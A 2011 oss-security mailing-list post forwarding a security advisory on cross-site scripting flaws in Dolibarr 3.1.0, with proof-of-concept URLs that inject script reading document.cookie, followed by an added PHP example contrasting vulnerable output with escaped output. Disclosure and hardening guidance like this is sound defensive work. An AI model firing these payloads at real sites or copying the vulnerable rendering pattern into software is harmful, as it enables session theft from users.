Message-ID: <20111121092944.GA16253@foo.fgeek.fi>
Date: Mon, 21 Nov 2011 11:29:44 +0200
From: Henri Salo <henri@...v.fi>
To: oss-security@...ts.openwall.com
Subject: Fwd: Multiple Cross-Site-Scripting vulnerabilities in Dolibarr 3.1.0

Can I get a CVE identifier for this issue, thank you? I verified with infoserve.de that they haven't already requested one.

Best regards,
Henri Salo

----- Forwarded message from security@...oserve.de -----

Date: Wed, 9 Nov 2011 09:59:18 GMT
From: security@...oserve.de
To: bugtraq@...urityfocus.com
Subject: Multiple Cross-Site-Scripting vulnerabilities in Dolibarr 3.1.0
X-Mailer: MIME-tools 5.420 (Entity 5.420)

Advisory: Multiple Cross-Site-Scripting vulnerabilities in Dolibarr 3.1.0
Advisory ID: INFOSERVE-ADV2011-03
Author: Stefan Schurtz
Contact: security@...oserve.de
Affected Software: Successfully tested on Dolibarr 3.1.0; other versions may also be affected
Vendor URL: http://www.dolibarr.org/
Vendor Status: fixed in the 3.1 branch

==========================
Vulnerability Description
==========================

Dolibarr 3.1.0 is prone to multiple XSS vulnerabilities.

==================
PoC-Exploit
==================

Cross-Site-Scripting - parameter 'username'

http://<target>/admin/company.php?mainmenu=home&leftmenu=setup&username='"</script><script>alert(document.cookie)</script>
http://<target>/admin/company.php?mainmenu=home&leftmenu=setup&username='"</script><script>alert(document.cookie)</script>&=3&optioncss=print

IE-only

http://<target>/admin/security_other.php/" stYle="x:expre/**/ssion(alert(document.cookie))
http://<target>/admin/events.php/" stYle="x:expre/**/ssion(alert(document.cookie))
http://<target>/admin/user.php/" stYle="x:expre/**/ssion(alert(document.cookie))

=========
Solution:
=========

Fixed in the 3.1 branch

====================
Disclosure Timeline:
====================

08-Nov-2011 - vendor informed
09-Nov-2011 - vendor fix in the 3.1 branch

========
Credits:
========

Vulnerabilities found and advisory written by INFOSERVE Security Team

===========
References:
===========

https://doliforge.org/tracker/?func=detail&aid=232&group_id=144
https://github.com/Dolibarr/dolibarr/commit/762f98ab4137749d0993612b4e3544a4207e78a1
http://www.dolibarr.org/
http://www.infoserve.de/

----- End forwarded message -----
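The two PoC shapes in the advisory correspond to two reflection patterns that are common in PHP applications: a query parameter echoed into an input's value attribute, and the request path echoed into a form action (PHP's `$_SERVER['PHP_SELF']` includes PATH_INFO, so a path suffix such as `/" stYle="...` lands in the markup). The following is an added example written for this page, not Dolibarr's code and not the referenced fix commit; the function names and the page layout are hypothetical, and the request values are constructed from the advisory's PoC URLs so it runs offline.

```php
<?php
// Added illustration (hypothetical code, not Dolibarr's source): the vulnerable
// rendering pattern implied by the advisory's PoCs, beside a hardened version.

// Assumed vulnerable pattern: user-controlled values interpolated raw into HTML.
function render_vulnerable(array $get, array $server): string
{
    $username = isset($get['username']) ? $get['username'] : '';
    // PHP_SELF carries PATH_INFO, so /admin/x.php/" stYle="..." is reflected as-is.
    $self = $server['PHP_SELF'];

    // '"</script><script>...  breaks out of the value attribute; the path payload
    // closes the action attribute and injects a style attribute (expression() only
    // executes in legacy IE, matching the advisory's "IE-only" note).
    return '<form action="' . $self . '" method="post">'
         . '<input type="text" name="username" value="' . $username . '">'
         . '</form>';
}

// Hardened version: escape every dynamic value for the HTML attribute context, and
// take the form target from SCRIPT_NAME, which does not include PATH_INFO.
function render_hardened(array $get, array $server): string
{
    $username = isset($get['username']) ? $get['username'] : '';
    $self = $server['SCRIPT_NAME'];

    $esc = function (string $s): string {
        // ENT_QUOTES escapes both ' and ", so attribute breakouts are neutralised.
        return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    };

    return '<form action="' . $esc($self) . '" method="post">'
         . '<input type="text" name="username" value="' . $esc($username) . '">'
         . '</form>';
}

// Constructed request values mirroring the advisory's PoC URLs (no live target).
$get = [
    'username' => '\'"</script><script>alert(document.cookie)</script>',
];
$server = [
    'SCRIPT_NAME' => '/admin/security_other.php',
    'PHP_SELF'    => '/admin/security_other.php/" stYle="x:expre/**/ssion(alert(document.cookie))',
];

echo "vulnerable:\n", render_vulnerable($get, $server), "\n\n";
echo "hardened:\n",   render_hardened($get, $server), "\n";
```

Running this with the PHP CLI shows the vulnerable output containing a live `<script>` element and a second `stYle=` attribute, while the hardened output contains only `&lt;`, `&quot;` and `&#039;` entities and an action of `/admin/security_other.php`. When verifying a fix for this class of bug, check both the query-string and the path-suffix vectors: escaping the parameter alone leaves the PHP_SELF reflection in place.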